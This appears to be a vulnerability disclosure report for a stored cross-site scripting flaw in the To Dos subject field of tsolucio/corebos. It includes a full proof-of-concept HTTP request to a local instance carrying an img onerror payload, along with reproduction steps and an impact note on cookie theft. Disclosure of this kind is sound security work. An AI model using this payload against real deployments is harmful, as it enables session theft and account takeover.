Cross-site Scripting (XSS) - Stored in tsolucio/corebos
Valid
Reported on
Sep 22nd 2021
Description
Stored XSS in Subject in To Dos
Proof of Concept
// PoC Request
POST /corebos/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------136503058339251009483555336795
Content-Length: 7141
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/corebos/index.php?module=cbCalendar&action=EditView&return_action=DetailView
Cookie: ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=609786462376996; _orangehrm=929bfb55f5e0dde7a982136b062a17de; BOXSID=4ipvdaiqhuu670rjgo3bspnd4h; 127001corebos=r2lm7d6pp76a2s5jsikfuv39k5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="__vt5rftk"
sid:3d0d662748c7e5561397afa2030143ed4c6533f8,1632324889
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="MAX_FILE_SIZE"
3000000
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="pagenumber"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="module"
cbCalendar
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="record"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="mode"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="action"
Save
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="saverepeat"
0
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="return_module"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="return_id"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="return_action"
DetailView
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="return_viewname"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="createmode"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="cbcustominfo1"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="cbcustominfo2"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="Module_Popup_Edit"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="Module_Popup_Save"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="Module_Popup_Save_Param"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="FILTERFIELDSMAP"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="search_url"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="subject"
"><iMg SrC="x" oNeRRor="alert(1);">
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="assigntype"
U
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="assigned_user_id"
1
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="assigned_group_id"
3
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="dtstart"
2021-09-22 03:34
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="timefmt_dtstart"
PM
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="dtend"
2021-09-22 04:34
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="timefmt_dtend"
PM
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="rel_id_type"
Accounts
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="rel_id"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="rel_id_display"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="cto_id_type"
Contacts
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="cto_id"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="cto_id_display"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="eventstatus"
Planned
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="taskpriority"
High
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="activitytype"
Call
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="visibility"
Private
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="location"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="relatedwith_type"
cbCalendar
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="relatedwith"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="relatedwith_display"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="description"
test
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="followupdt"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="timefmt_followupdt"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="followuptype"
Call
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="inviteesid"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="set_reminder"
No
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="remdays"
0
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="remhrs"
0
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="remmin"
10
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="repeat_frequency"
1
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="recurringtype"
Daily
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="calendar_repeat_limit_date"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="repeatMonth"
date
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="repeatMonth_date"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="repeatMonth_daytype"
first
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="repeatMonth_day"
1
-----------------------------136503058339251009483555336795--
Step to reproduce
Go to My Home Page > To Dos > Create To Do
At Subject input with payload "><iMg SrC="x" oNeRRor="alert(1);">
The XSS will trigger on notification after that but it takes a few seconds
Video PoC: PoC
Impact
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie. When the malicious To Dos is assigned to any group, the attacker will get all the user cookies in that group
We have contacted a member of the
tsolucio/corebos
team and are waiting to hear back
2 years ago
to join this conversation